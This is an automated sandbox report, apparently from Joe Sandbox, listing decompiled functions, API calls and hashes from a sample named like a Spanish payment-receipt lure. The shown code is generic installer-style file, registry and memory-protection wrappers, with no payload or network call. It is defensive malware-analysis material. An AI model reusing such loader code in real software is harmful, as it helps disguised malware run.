                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FilePointerwsprintf
                                        • String ID:
                                        • API String ID: 327478801-0
                                        • Opcode ID: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
                                        • Instruction ID: 21d8c208f5d5b54c8d66c8a0ecd09dde93b5cc4591d01b86724f3e283dce4822
                                        • Opcode Fuzzy Hash: 876bb964a1d0d5fa4607f701cb9d9138871ffb593e28fb7de57c31c7f2bc0863
                                        • Instruction Fuzzy Hash: B0E06D72A00104AEDB11EBA5AE498AE7779EB80304B18803BF101F51D2CA790D128A2E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00401735() {
                                        				long _t5;
                                        				WCHAR* _t8;
                                        				WCHAR* _t12;
                                        				void* _t14;
                                        				long _t17;
                                        
                                        				_t5 = SearchPathW(_t8, E00402C37(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                        				_t17 = _t5;
                                        				if(_t17 == 0) {
                                        					 *((intOrPtr*)(_t14 - 4)) = 1;
                                        					 *_t12 = _t8;
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
                                        				return 0;
                                        			}








                                        0x00401749
                                        0x0040174f
                                        0x00401751
                                        0x00402853
                                        0x0040285a
                                        0x0040285a
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: PathSearch
                                        • String ID:
                                        • API String ID: 2203818243-0
                                        • Opcode ID: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
                                        • Instruction ID: 1a21f3817f07a007d07fb30ace0b1820adccec601593f7c7bbd26e2b342b2bae
                                        • Opcode Fuzzy Hash: 875acb00c645770f213fe7cf4565295393cc7a65273a1ece8f838635e2e5a846
                                        • Instruction Fuzzy Hash: 33E048B2704104AAD750DBA4DE49AAA7758DF40368B20853AF111E51C1D6B45941976D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004060FA(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                        				void* _t7;
                                        				long _t8;
                                        				void* _t9;
                                        
                                        				_t7 = E00406051(_a4,  &_a12);
                                        				if(_t7 != 0) {
                                        					_t8 = RegCreateKeyExW(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                        					return _t8;
                                        				}
                                        				_t9 = 6;
                                        				return _t9;
                                        			}






                                        0x00406104
                                        0x0040610d
                                        0x00406123
                                        0x00000000
                                        0x00406123
                                        0x00406111
                                        0x00000000

                                        APIs
                                        • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406123
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Create
                                        • String ID:
                                        • API String ID: 2289755597-0
                                        • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                        • Instruction ID: 1ce12e5a620d0377d06846f84a02a75369475120c61fa63bf0211ee428df1362
                                        • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                        • Instruction Fuzzy Hash: 67E0E6B2010109BEDF099F50DD0AD7B371DE704704F01492EFA06D4051E6B5E9706B74
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405E03(void* _a4, void* _a8, long _a12) {
                                        				int _t7;
                                        				long _t11;
                                        
                                        				_t11 = _a12;
                                        				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                        				if(_t7 == 0 || _t11 != _a12) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}





                                        0x00405e07
                                        0x00405e17
                                        0x00405e1f
                                        0x00000000
                                        0x00405e26
                                        0x00000000
                                        0x00405e28

                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032BB,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E17
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                        • Instruction ID: c8204e3b8f5822b3fc4a752f4075b10d4d5d267c9e9767057f3313d1a75d1f26
                                        • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                        • Instruction Fuzzy Hash: 38E0E632510559ABDF116F55DC00AEB775CFB05360F004436FD55E7150D671E9219BE4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405DD4(void* _a4, void* _a8, long _a12) {
                                        				int _t7;
                                        				long _t11;
                                        
                                        				_t11 = _a12;
                                        				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                        				if(_t7 == 0 || _t11 != _a12) {
                                        					return 0;
                                        				} else {
                                        					return 1;
                                        				}
                                        			}





                                        0x00405dd8
                                        0x00405de8
                                        0x00405df0
                                        0x00000000
                                        0x00405df7
                                        0x00000000
                                        0x00405df9

                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403305,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405DE8
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                        • Instruction ID: b9e836fab2427aaa168680a15f0f0ce7fefe47de654f12bfd99ea101fd6ea48b
                                        • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                        • Instruction Fuzzy Hash: 7DE0EC3222425EABDF509E559C04EEB7B6DEF05360F048837FD15E7160D631E921ABA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                        
                                        				 *0x10004048 = _a4;
                                        				if(_a8 == 1) {
                                        					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                        					 *0x1000405c = 0xc2;
                                        					 *0x1000404c = 0;
                                        					 *0x10004054 = 0;
                                        					 *0x10004068 = 0;
                                        					 *0x10004058 = 0;
                                        					 *0x10004050 = 0;
                                        					 *0x10004060 = 0;
                                        					 *0x1000405e = 0;
                                        				}
                                        				return 1;
                                        			}



                                        0x100027cb
                                        0x100027d0
                                        0x100027e0
                                        0x100027e8
                                        0x100027ef
                                        0x100027f4
                                        0x100027f9
                                        0x100027fe
                                        0x10002803
                                        0x10002808
                                        0x1000280d
                                        0x1000280d
                                        0x10002815

                                        APIs
                                        • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual
                                        • String ID:
                                        • API String ID: 544645111-0
                                        • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                        • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                        • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                        • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004060CC(void* __eflags, intOrPtr _a4, short* _a8, int _a12, void** _a16) {
                                        				void* _t7;
                                        				long _t8;
                                        				void* _t9;
                                        
                                        				_t7 = E00406051(_a4,  &_a12);
                                        				if(_t7 != 0) {
                                        					_t8 = RegOpenKeyExW(_t7, _a8, 0, _a12, _a16); // executed
                                        					return _t8;
                                        				}
                                        				_t9 = 6;
                                        				return _t9;
                                        			}






                                        0x004060d6
                                        0x004060dd
                                        0x004060f0
                                        0x00000000
                                        0x004060f0
                                        0x004060e1
                                        0x00000000

                                        APIs
                                        • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,0040615A,007A0F00,00000000,?,?,Call,?), ref: 004060F0
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                        • Instruction ID: ced63528db1e32a5bcf3a8a8acf2bd7baad3650648e26365f6afbd74657f9209
                                        • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                        • Instruction Fuzzy Hash: BED0123208020DBBDF219F909D01FAB375DAB04354F018436FE06E4190DB76D570AB14
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004015A3() {
                                        				int _t5;
                                        				void* _t11;
                                        				int _t14;
                                        
                                        				_t5 = SetFileAttributesW(E00402C37(0xfffffff0),  *(_t11 - 0x24)); // executed
                                        				_t14 = _t5;
                                        				if(_t14 == 0) {
                                        					 *((intOrPtr*)(_t11 - 4)) = 1;
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
                                        				return 0;
                                        			}






                                        0x004015ae
                                        0x004015b4
                                        0x004015b6
                                        0x00402885
                                        0x00402885
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
                                        • Instruction ID: 129b57beed9750de1dc8ac5f086523220a35585882bce30df6ddda6966387252
                                        • Opcode Fuzzy Hash: 6eb76b24ce870ef992c4327a1b2b518c4e6cabc1d7ccad815c10311b33b2bb2a
                                        • Instruction Fuzzy Hash: DFD01272B04104DBDB51DBE4AF0859D72A5AB50364B208577E101F11D1DABD89549B19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E004041F4(intOrPtr _a12) {
                                        				intOrPtr _v0;
                                        				struct HWND__* _v4;
                                        				int _t7;
                                        				void* _t8;
                                        				void* _t9;
                                        				void* _t10;
                                        
                                        				_t7 = SetDlgItemTextW(_v4, _v0 + 0x3e8, E00406281(_t8, _t9, _t10, 0, _a12)); // executed
                                        				return _t7;
                                        			}









                                        0x0040420e
                                        0x00404213

                                        APIs
                                        • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040420E
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: ItemText
                                        • String ID:
                                        • API String ID: 3367045223-0
                                        • Opcode ID: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
                                        • Instruction ID: f5da9590e85ea14362a2b992ac95bea4d8dfad4da802ef44e2657ae46e782bfa
                                        • Opcode Fuzzy Hash: 73c06e2a9123b891731a7ebfb9029f8f008127f7581a586f7a1d4e0a57963b9e
                                        • Instruction Fuzzy Hash: 13C04C76548200BFD682B755CC42F1FB799EF94315F04C52EB59DE11D1CA3584319A26
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00404240(int _a4) {
                                        				struct HWND__* _t2;
                                        				long _t3;
                                        
                                        				_t2 =  *0x7a79f8; // 0x10384
                                        				if(_t2 != 0) {
                                        					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                        					return _t3;
                                        				}
                                        				return _t2;
                                        			}





                                        0x00404240
                                        0x00404247
                                        0x00404252
                                        0x00000000
                                        0x00404252
                                        0x00404258

                                        APIs
                                        • SendMessageW.USER32(00010384,00000000,00000000,00000000), ref: 00404252
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                        • Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
                                        • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                        • Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00403308(long _a4) {
                                        				long _t2;
                                        
                                        				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                        				return _t2;
                                        			}




                                        0x00403316
                                        0x0040331c

                                        APIs
